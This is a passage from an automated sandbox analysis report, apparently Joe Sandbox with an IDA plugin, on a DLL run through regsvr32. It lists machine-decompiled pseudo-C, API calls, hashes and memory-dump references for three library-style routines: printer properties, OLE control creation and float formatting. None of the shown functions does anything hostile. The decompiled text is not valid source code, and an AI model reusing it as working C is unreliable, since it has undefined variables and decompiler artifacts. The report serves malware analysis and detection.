                                                                                                            • Opcode ID: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                                                            • Instruction ID: 2e24e30c7814501e8ef39cdb76116c26bdbe99ae311f6264528fd307033058d9
                                                                                                            • Opcode Fuzzy Hash: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                                                            • Instruction Fuzzy Hash: BD21677150022D7ADB01EBB09C44FDEBBACEB453B2FA08661FC12D61C1D6718E818B64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001F60C Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E1001F60C(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x70);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x6c);
							if( *(_t35 + 0x6c) != 0) {
								E10029C1B(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x6c) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10029C1B( *(_t35 + 0x6c));
								 *(_t35 + 0x6c) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                                                                                                            0x1001f60f
                                                                                                            0x1001f611
                                                                                                            0x1001f613
                                                                                                            0x1001f61b
                                                                                                            0x1001f635
                                                                                                            0x1001f63d
                                                                                                            0x1001f647
                                                                                                            0x1001f64e
                                                                                                            0x1001f650
                                                                                                            0x1001f655
                                                                                                            0x1001f658
                                                                                                            0x1001f658
                                                                                                            0x1001f66f
                                                                                                            0x1001f676
                                                                                                            0x1001f68e
                                                                                                            0x1001f693
                                                                                                            0x1001f698
                                                                                                            0x1001f698
                                                                                                            0x1001f69e
                                                                                                            0x1001f69e
                                                                                                            0x1001f64e
                                                                                                            0x1001f6a3
                                                                                                            0x1001f6a7

                                                                                                            APIs
                                                                                                            • GlobalLock.KERNEL32 ref: 1001F629
                                                                                                            • lstrcmpA.KERNEL32(?,?), ref: 1001F635
                                                                                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1001F647
                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F667
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F66F
                                                                                                            • GlobalLock.KERNEL32 ref: 1001F679
                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1001F686
                                                                                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1001F69E
                                                                                                              • Part of subcall function 10029C1B: GlobalFlags.KERNEL32(?), ref: 10029C25
                                                                                                              • Part of subcall function 10029C1B: GlobalUnlock.KERNEL32(?,00000000,?,1001F698,?,00000000,?,?,00000000,00000000,00000002), ref: 10029C36
                                                                                                              • Part of subcall function 10029C1B: GlobalFree.KERNEL32 ref: 10029C41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 168474834-0
                                                                                                            • Opcode ID: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                                                            • Instruction ID: 2a491371b327142203fc8723eb74c2771e75d1908c59da801caef355c7fd3301
                                                                                                            • Opcode Fuzzy Hash: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                                                            • Instruction Fuzzy Hash: 61118E76500208BEDB12DBAACC86D7F7AFDEF85784B50081DF645EA122D671ED80DB24
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100074F2 Relevance: 10.7, APIs: 7, Instructions: 247memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E100074F2(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t132;
				int* _t133;
				int _t138;
				intOrPtr* _t139;
				int _t142;
				int* _t143;
				int _t146;
				int _t171;
				intOrPtr _t172;
				int _t173;
				intOrPtr _t178;
				int _t183;
				int _t186;
				void* _t187;
				int* _t191;
				void* _t213;
				int* _t216;
				short _t217;
				intOrPtr* _t225;
				void* _t227;
				struct tagRECT _t228;
				int* _t229;
				signed int _t233;
				int* _t235;
				int* _t237;
				int* _t238;
				void* _t239;

				_t227 = __esi;
				E10011BF0(0x1003a548, _t239);
				_t132 =  *0x1004c470; // 0xf3933a06
				_t225 =  *((intOrPtr*)(_t239 + 0x14));
				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
				_t183 = 0;
				_t133 = _t225 + 0x12;
				 *(_t239 - 0x34) = _t133;
				if( *(_t239 + 0x10) != 0) {
					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
					 *((short*)(_t239 - 0x4a)) =  *_t133;
					_t216 = _t225 + 0x18;
					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
					_t225 = _t239 - 0x58;
					 *(_t239 - 0x34) = _t216;
				}
				_t217 =  *((short*)(_t225 + 0xa));
				_push(_t227);
				_t228 =  *((short*)(_t225 + 8));
				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
				 *(_t239 - 0x68) = _t228;
				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
				_t229 =  *(_t239 + 0x1c);
				 *(_t239 - 0x28) = _t183;
				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
					_t186 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
					_t229 =  &(_t229[1]);
					if(_t186 > 0) {
						__imp__#4(_t229, _t186);
						_t187 = _t186 + _t186;
						_t229 = _t229 + _t187;
						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
						 *(_t239 - 0x28) = _t138;
					}
					_t183 = 0;
				}
				 *(_t239 - 0x2c) = _t183;
				_t139 = E100243B2();
				_t218 =  *_t139;
				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
				 *(_t239 - 4) = _t183;
				 *(_t239 - 0x38) = _t183;
				 *(_t239 - 0x3c) = _t183;
				 *(_t239 - 0x30) = _t183;
				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
					_t142 =  *_t229;
					_t49 = _t142 - 0xc; // -28
					_t191 = _t49;
					_t229 =  &(_t229[3]);
					 *(_t239 - 0x40) = _t142;
					 *(_t239 + 0x1c) = _t191;
					if(_t191 > _t183) {
						do {
							_t171 =  *_t229;
							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
							_t235 =  &(_t229[1]);
							_t229 =  &(_t235[0]);
							 *(_t239 - 0x44) = _t171;
							 *(_t239 + 0x10) =  *_t235;
							if(_t171 != 0x80010001) {
								_t172 = E1001F77E(0x1c);
								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
								__eflags = _t172 - _t183;
								 *(_t239 - 4) = 1;
								if(_t172 == _t183) {
									_t173 = 0;
									__eflags = 0;
								} else {
									_t173 = E1000B256(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
								}
								 *(_t239 - 4) = 0;
								 *(_t239 - 0x2c) = _t173;
							} else {
								_t237 =  &(_t229[1]);
								 *(_t239 - 0x3c) =  *_t229;
								_t238 =  &(_t237[3]);
								 *(_t239 - 0x30) =  *_t237;
								E10006AEC(_t239 + 0x14, _t238);
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
								_t213 = 0xffffffef;
								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
								_t229 = _t238 + _t178 + 1;
								 *(_t239 - 0x38) =  *(_t239 + 0x10);
							}
						} while ( *(_t239 + 0x1c) > _t183);
						_t142 =  *(_t239 - 0x40);
					}
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
				}
				_t143 =  *(_t239 - 0x34);
				_t256 =  *_t143 - 0x7b;
				_push(_t239 - 0x20);
				_push(_t143);
				if( *_t143 != 0x7b) {
					__imp__CLSIDFromProgID();
				} else {
					__imp__CLSIDFromString();
				}
				_push(_t183);
				_push( *((intOrPtr*)(_t239 + 0x20)));
				_push(_t229);
				 *(_t239 + 0x1c) = _t143;
				E1002EC6C(_t239 - 0x94, _t256);
				 *(_t239 - 4) = 2;
				 *(_t239 - 0x24) = _t183;
				asm("sbb esi, esi");
				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
				if( *(_t239 + 0x1c) >= _t183 && E100090DE( *((intOrPtr*)(_t239 + 8))) != 0 && E10009A9F( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
					E1000A762( *(_t239 - 0x24), 1);
					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
					E100074A5(_t183,  *(_t239 - 0x24) + 0xa0, _t239, _t239 + 0x14);
					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
				}
				if( *(_t239 - 0x28) != _t183) {
					__imp__#6( *(_t239 - 0x28));
				}
				_t146 =  *(_t239 - 0x24);
				if(_t146 == _t183) {
					 *( *(_t239 + 0x24)) = _t183;
				} else {
					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
					_t183 = 1;
				}
				 *(_t239 - 4) = 0;
				E1002EFD7(_t183, _t239 - 0x94, _t218);
				E100014B0( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
				return E100117AE(_t183,  *((intOrPtr*)(_t239 - 0x10)));
			}






























                                                                                                            0x100074f2
                                                                                                            0x100074f7
                                                                                                            0x10007502
                                                                                                            0x10007509
                                                                                                            0x1000750c
                                                                                                            0x1000750f
                                                                                                            0x10007514
                                                                                                            0x10007517
                                                                                                            0x1000751a
                                                                                                            0x10007522
                                                                                                            0x10007528
                                                                                                            0x1000752f
                                                                                                            0x10007539
                                                                                                            0x10007541
                                                                                                            0x10007549
                                                                                                            0x1000754c
                                                                                                            0x10007550
                                                                                                            0x10007554
                                                                                                            0x10007557
                                                                                                            0x10007557
                                                                                                            0x1000755a
                                                                                                            0x10007568
                                                                                                            0x10007569
                                                                                                            0x1000756d
                                                                                                            0x1000757c
                                                                                                            0x1000757f
                                                                                                            0x10007582
                                                                                                            0x10007585
                                                                                                            0x1000758f
                                                                                                            0x10007592
                                                                                                            0x10007595
                                                                                                            0x10007597
                                                                                                            0x10007599
                                                                                                            0x1000759d
                                                                                                            0x100075a2
                                                                                                            0x100075a6
                                                                                                            0x100075ac
                                                                                                            0x100075ae
                                                                                                            0x100075b0
                                                                                                            0x100075b3
                                                                                                            0x100075b3
                                                                                                            0x100075b6
                                                                                                            0x100075b6
                                                                                                            0x100075b8
                                                                                                            0x100075bb
                                                                                                            0x100075c0
                                                                                                            0x100075ca
                                                                                                            0x100075d3
                                                                                                            0x100075d6
                                                                                                            0x100075d9
                                                                                                            0x100075dc
                                                                                                            0x100075df
                                                                                                            0x100075ed
                                                                                                            0x100075ef
                                                                                                            0x100075ef
                                                                                                            0x100075f2
                                                                                                            0x100075f7
                                                                                                            0x100075fa
                                                                                                            0x100075fd
                                                                                                            0x10007603
                                                                                                            0x10007603
                                                                                                            0x10007605
                                                                                                            0x10007609
                                                                                                            0x10007610
                                                                                                            0x10007616
                                                                                                            0x10007619
                                                                                                            0x1000761d
                                                                                                            0x10007654
                                                                                                            0x1000765a
                                                                                                            0x1000765d
                                                                                                            0x1000765f
                                                                                                            0x10007663
                                                                                                            0x10007677
                                                                                                            0x10007677
                                                                                                            0x10007665
                                                                                                            0x10007670
                                                                                                            0x10007670
                                                                                                            0x10007679
                                                                                                            0x1000767d
                                                                                                            0x1000761f
                                                                                                            0x10007621
                                                                                                            0x10007624
                                                                                                            0x10007629
                                                                                                            0x10007630
                                                                                                            0x10007633
                                                                                                            0x1000763b
                                                                                                            0x10007640
                                                                                                            0x10007643
                                                                                                            0x10007646
                                                                                                            0x1000764d
                                                                                                            0x1000764d
                                                                                                            0x10007680
                                                                                                            0x10007689
                                                                                                            0x10007689
                                                                                                            0x1000768c
                                                                                                            0x1000768f
                                                                                                            0x1000768f
                                                                                                            0x10007696
                                                                                                            0x10007699
                                                                                                            0x100076a0
                                                                                                            0x100076a1
                                                                                                            0x100076a2
                                                                                                            0x100076ac
                                                                                                            0x100076a4
                                                                                                            0x100076a4
                                                                                                            0x100076a4
                                                                                                            0x100076b2
                                                                                                            0x100076b3
                                                                                                            0x100076bc
                                                                                                            0x100076bd
                                                                                                            0x100076c0
                                                                                                            0x100076d7
                                                                                                            0x100076db
                                                                                                            0x100076de
                                                                                                            0x100076e0
                                                                                                            0x100076e5
                                                                                                            0x10007734
                                                                                                            0x10007748
                                                                                                            0x10007754
                                                                                                            0x10007767
                                                                                                            0x10007773
                                                                                                            0x10007780
                                                                                                            0x1000778c
                                                                                                            0x1000778c
                                                                                                            0x10007796
                                                                                                            0x1000779b
                                                                                                            0x1000779b
                                                                                                            0x100077a1
                                                                                                            0x100077a6
                                                                                                            0x100077b8
                                                                                                            0x100077a8
                                                                                                            0x100077b0
                                                                                                            0x100077b2
                                                                                                            0x100077b2
                                                                                                            0x100077c0
                                                                                                            0x100077c4
                                                                                                            0x100077cf
                                                                                                            0x100077d8
                                                                                                            0x100077eb

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 100074F7
                                                                                                            • MapDialogRect.USER32(?,?), ref: 10007585
                                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 100075A6
                                                                                                            • CLSIDFromString.OLE32(?,00000004), ref: 100076A4
                                                                                                            • CLSIDFromProgID.OLE32(?,00000004), ref: 100076AC
                                                                                                            • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 10007748
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 1000779B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 493809305-0
                                                                                                            • Opcode ID: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                                                            • Instruction ID: 430f13df2ed8550076e5f7c2e9f31eb497c55eb67174fe5e7936e43fbe5827de
                                                                                                            • Opcode Fuzzy Hash: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                                                            • Instruction Fuzzy Hash: F5A12475D00619DFDB04CFA8C884AEDBBF4FF08344F118529E819AB251E735AE90CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001BC3A Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 228COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 73%
                                                                                                            			E1001BC3A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
				intOrPtr _v8;
				char _v9;
				signed int _v10;
				signed int _v14;
				signed int _v18;
				signed short _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v44;
				signed int _v48;
				signed short* _v52;
				intOrPtr _t87;
				signed int _t88;
				signed short* _t99;
				intOrPtr* _t100;
				signed int _t101;
				signed short _t103;
				signed int _t105;
				signed short* _t131;
				signed int _t133;
				signed int _t139;
				signed short* _t141;
				signed short _t149;
				signed int _t151;
				signed int _t152;
				signed int _t159;
				signed int _t161;
				signed int _t164;
				void* _t165;
				void* _t166;

				_t87 =  *0x1004c470; // 0xf3933a06
				_v8 = _t87;
				_t88 = _a12;
				_t131 = _a24;
				_t133 = _t88 & 0x00008000;
				_v32 = 0xcc;
				_v31 = 0xcc;
				_v30 = 0xcc;
				_v29 = 0xcc;
				_v28 = 0xcc;
				_v27 = 0xcc;
				_v26 = 0xcc;
				_v25 = 0xcc;
				_v24 = 0xcc;
				_v23 = 0xcc;
				_v22 = 0xfb;
				_v21 = 0x3f;
				_v48 = 1;
				_t149 = _t88 & 0x00007fff;
				if(_t133 == 0) {
					_t131[1] = 0x20;
				} else {
					_t131[1] = 0x2d;
				}
				_t151 = _a8;
				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
					if(_t149 != 0x7fff) {
						_t90 = _t149 & 0x0000ffff;
						_v20 = _v20 & 0x00000000;
						_v18 = _a4;
						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
						_v10 = _t149;
						_v14 = _t151;
						E1001C383(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
						_t166 = _t165 + 0xc;
						__eflags = _v10 - 0x3fff;
						if(_v10 >= 0x3fff) {
							_t159 = _t159 + 1;
							__eflags = _t159;
							E1001C151(_t131, _t151, _t159,  &_v20,  &_v32);
						}
						__eflags = _a20 & 0x00000001;
						_t152 = _a16;
						 *_t131 = _t159;
						if((_a20 & 0x00000001) == 0) {
							L27:
							__eflags = _t152 - 0x15;
							if(_t152 > 0x15) {
								_t152 = 0x15;
							}
							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
							_t52 =  &_v10;
							 *_t52 = _v10 & 0x00000000;
							__eflags =  *_t52;
							_a12 = 8;
							do {
								E1001B6CD( &_v20);
								_t56 =  &_a12;
								 *_t56 = _a12 - 1;
								__eflags =  *_t56;
							} while ( *_t56 != 0);
							__eflags = _t161;
							if(_t161 < 0) {
								_t164 =  ~_t161 & 0x000000ff;
								__eflags = _t164;
								if(_t164 > 0) {
									do {
										E1001B6FB( &_v20);
										_t164 = _t164 - 1;
										__eflags = _t164;
									} while (_t164 != 0);
								}
							}
							_t59 = _t152 + 1; // 0xcd
							_t139 = _t59;
							__eflags = _t139;
							_t99 =  &(_t131[2]);
							_v52 = _t99;
							if(_t139 > 0) {
								_a12 = _t139;
								do {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									E1001B6CD( &_v20);
									E1001B6CD( &_v20);
									E1001B66F(__eflags,  &_v20,  &_v44);
									E1001B6CD( &_v20);
									_t166 = _t166 + 0x14;
									_v52 =  &(_v52[0]);
									_t74 =  &_a12;
									 *_t74 = _a12 - 1;
									__eflags =  *_t74;
									 *_v52 = _v9 + 0x30;
									_v9 = 0;
								} while ( *_t74 != 0);
								_t99 = _v52;
							}
							_t100 = _t99 - 1;
							_t101 = _t100 - 1;
							__eflags =  *_t100 - 0x35;
							_t141 =  &(_t131[2]);
							if( *_t100 < 0x35) {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x30;
									if( *_t101 == 0x30) {
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 >= _t141) {
									goto L46;
								} else {
									 *_t141 = 0x30;
									goto L54;
								}
							} else {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x39;
									if( *_t101 == 0x39) {
										 *_t101 = 0x30;
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 < _t141) {
									_t101 = _t101 + 1;
									 *_t131 =  *_t131 + 1;
									__eflags =  *_t131;
								}
								 *_t101 =  *_t101 + 1;
								__eflags =  *_t101;
								L46:
								_t103 = _t101 - _t131 - 3;
								__eflags = _t103;
								_t131[1] = _t103;
								 *((char*)( &(_t131[2]) + _t103)) = 0;
								goto L47;
							}
						} else {
							_t152 = _t152 + _t159;
							__eflags = _t152;
							if(_t152 > 0) {
								goto L27;
							} else {
								goto L26;
							}
						}
					} else {
						 *_t131 = 1;
						if(_t151 != 0x80000000 || _a4 != 0) {
							if((_t151 & 0x40000000) != 0) {
								goto L11;
							} else {
								_push("1#SNAN");
								goto L21;
							}
						} else {
							L11:
							__eflags = _t133;
							if(_t133 == 0) {
								L15:
								__eflags = _t151 - 0x80000000;
								if(_t151 != 0x80000000) {
									goto L20;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										goto L20;
									} else {
										_push("1#INF");
										goto L18;
									}
								}
							} else {
								__eflags = _t151 - 0xc0000000;
								if(_t151 != 0xc0000000) {
									goto L15;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										L20:
										_push("1#QNAN");
										L21:
										_push( &(_t131[2]));
										E10017B90();
										_t131[1] = 6;
									} else {
										_push("1#IND");
										L18:
										_push( &(_t131[2]));
										E10017B90();
										_t131[1] = 5;
									}
								}
							}
						}
						_v48 = _v48 & 0x00000000;
						L47:
						_t105 = _v48;
					}
				} else {
					L26:
					_t131[2] = 0x30;
					L54:
					 *_t131 =  *_t131 & 0x00000000;
					_t131[1] = 0x20;
					_t131[1] = 1;
					_t131[2] = 0;
					_t105 = 1;
				}
				return E100117AE(_t105, _v8);
			}











































                                                                                                            0x1001bc40
                                                                                                            0x1001bc45
                                                                                                            0x1001bc48
                                                                                                            0x1001bc4c
                                                                                                            0x1001bc57
                                                                                                            0x1001bc63
                                                                                                            0x1001bc67
                                                                                                            0x1001bc6b
                                                                                                            0x1001bc6f
                                                                                                            0x1001bc73
                                                                                                            0x1001bc77
                                                                                                            0x1001bc7b
                                                                                                            0x1001bc7f
                                                                                                            0x1001bc83
                                                                                                            0x1001bc87
                                                                                                            0x1001bc8b
                                                                                                            0x1001bc8f
                                                                                                            0x1001bc93
                                                                                                            0x1001bc9a
                                                                                                            0x1001bc9c
                                                                                                            0x1001bca4
                                                                                                            0x1001bc9e
                                                                                                            0x1001bc9e
                                                                                                            0x1001bc9e
                                                                                                            0x1001bcab
                                                                                                            0x1001bcae
                                                                                                            0x1001bcc0
                                                                                                            0x1001bd3a
                                                                                                            0x1001bd45
                                                                                                            0x1001bd62
                                                                                                            0x1001bd65
                                                                                                            0x1001bd74
                                                                                                            0x1001bd78
                                                                                                            0x1001bd7b
                                                                                                            0x1001bd80
                                                                                                            0x1001bd83
                                                                                                            0x1001bd89
                                                                                                            0x1001bd93
                                                                                                            0x1001bd93
                                                                                                            0x1001bd94
                                                                                                            0x1001bd9a
                                                                                                            0x1001bd9b
                                                                                                            0x1001bd9f
                                                                                                            0x1001bda2
                                                                                                            0x1001bda5
                                                                                                            0x1001bdb9
                                                                                                            0x1001bdb9
                                                                                                            0x1001bdbc
                                                                                                            0x1001bdc0
                                                                                                            0x1001bdc0
                                                                                                            0x1001bdc5
                                                                                                            0x1001bdcb
                                                                                                            0x1001bdcb
                                                                                                            0x1001bdcb
                                                                                                            0x1001bdd0
                                                                                                            0x1001bdd7
                                                                                                            0x1001bddb
                                                                                                            0x1001bde0
                                                                                                            0x1001bde0
                                                                                                            0x1001bde0
                                                                                                            0x1001bde3
                                                                                                            0x1001bde6
                                                                                                            0x1001bde8
                                                                                                            0x1001bdec
                                                                                                            0x1001bdec
                                                                                                            0x1001bdf2
                                                                                                            0x1001bdf4
                                                                                                            0x1001bdf8
                                                                                                            0x1001bdfd
                                                                                                            0x1001bdfd
                                                                                                            0x1001bdfe
                                                                                                            0x1001bdf4
                                                                                                            0x1001bdf2
                                                                                                            0x1001be01
                                                                                                            0x1001be01
                                                                                                            0x1001be04
                                                                                                            0x1001be06
                                                                                                            0x1001be09
                                                                                                            0x1001be0c
                                                                                                            0x1001be0e
                                                                                                            0x1001be11
                                                                                                            0x1001be17
                                                                                                            0x1001be18
                                                                                                            0x1001be1d
                                                                                                            0x1001be1e
                                                                                                            0x1001be27
                                                                                                            0x1001be34
                                                                                                            0x1001be3d
                                                                                                            0x1001be4a
                                                                                                            0x1001be4d
                                                                                                            0x1001be50
                                                                                                            0x1001be50
                                                                                                            0x1001be50
                                                                                                            0x1001be53
                                                                                                            0x1001be55
                                                                                                            0x1001be55
                                                                                                            0x1001be5b
                                                                                                            0x1001be5b
                                                                                                            0x1001be5e
                                                                                                            0x1001be61
                                                                                                            0x1001be62
                                                                                                            0x1001be65
                                                                                                            0x1001be68
                                                                                                            0x1001bea8
                                                                                                            0x1001bea8
                                                                                                            0x1001beaa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001bea2
                                                                                                            0x1001bea5
                                                                                                            0x1001bea7
                                                                                                            0x1001bea7
                                                                                                            0x00000000
                                                                                                            0x1001bea7
                                                                                                            0x00000000
                                                                                                            0x1001bea5
                                                                                                            0x1001beac
                                                                                                            0x1001beae
                                                                                                            0x00000000
                                                                                                            0x1001beb0
                                                                                                            0x1001beb0
                                                                                                            0x00000000
                                                                                                            0x1001beb0
                                                                                                            0x1001be6a
                                                                                                            0x1001be75
                                                                                                            0x1001be75
                                                                                                            0x1001be77
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001be6c
                                                                                                            0x1001be6f
                                                                                                            0x1001be71
                                                                                                            0x1001be74
                                                                                                            0x1001be74
                                                                                                            0x00000000
                                                                                                            0x1001be74
                                                                                                            0x00000000
                                                                                                            0x1001be6f
                                                                                                            0x1001be79
                                                                                                            0x1001be7b
                                                                                                            0x1001be7d
                                                                                                            0x1001be7e
                                                                                                            0x1001be7e
                                                                                                            0x1001be7e
                                                                                                            0x1001be81
                                                                                                            0x1001be81
                                                                                                            0x1001be83
                                                                                                            0x1001be85
                                                                                                            0x1001be85
                                                                                                            0x1001be87
                                                                                                            0x1001be8d
                                                                                                            0x00000000
                                                                                                            0x1001be8d
                                                                                                            0x1001bda7
                                                                                                            0x1001bdaa
                                                                                                            0x1001bdac
                                                                                                            0x1001bdae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001bdae
                                                                                                            0x1001bcc2
                                                                                                            0x1001bcc9
